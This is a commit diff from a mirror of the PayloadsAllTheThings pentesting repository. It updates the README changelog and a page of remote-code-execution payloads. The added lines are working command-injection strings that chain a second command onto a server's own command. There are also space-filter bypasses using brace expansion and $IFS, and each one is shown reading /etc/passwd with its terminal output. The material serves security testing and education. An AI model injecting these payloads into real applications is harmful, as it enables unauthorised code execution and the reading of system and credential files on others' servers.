mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 18:36:10 +00:00
Update RCE payloads and README
This commit is contained in:
parent
2829592730
commit
9f66d48f2b
@ -5,9 +5,8 @@ I <3 pull requests :)
|
||||
|
||||
Last modifications :
|
||||
* XSS paylods improved
|
||||
* CRLF payloads improved
|
||||
* SQLi payloads improved
|
||||
* Enumeration added (WIP)
|
||||
* Methodology added
|
||||
* AWS Bucket added
|
||||
|
||||
# Tools
|
||||
|
||||
|
@ -12,11 +12,27 @@ bin:x:2:2:bin:/bin:/bin/sh
|
||||
sys:x:3:3:sys:/dev:/bin/sh
|
||||
```
|
||||
|
||||
Code execution by chaining commands
|
||||
```
|
||||
original_cmd_by_server; ls
|
||||
original_cmd_by_server && ls
|
||||
original_cmd_by_server | ls
|
||||
```
|
||||
|
||||
Code execution without space
|
||||
```
|
||||
{cat,/etc/passwd}
|
||||
cat$IFS/etc/passwd
|
||||
swissky@crashlab▸ ~ ▸ $ {cat,/etc/passwd}
|
||||
root:x:0:0:root:/root:/bin/bash
|
||||
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
|
||||
|
||||
swissky@crashlab▸ ~ ▸ $ cat$IFS/etc/passwd
|
||||
root:x:0:0:root:/root:/bin/bash
|
||||
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
|
||||
|
||||
swissky@crashlab▸ ~ ▸ $ echo${IFS}"RCE"${IFS}&&cat${IFS}/etc/passwd
|
||||
RCE
|
||||
root:x:0:0:root:/root:/bin/bash
|
||||
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
|
||||
```
|
||||
|
||||
NodeJS Code execution
|
||||
|
Loading…
Reference in New Issue
Block a user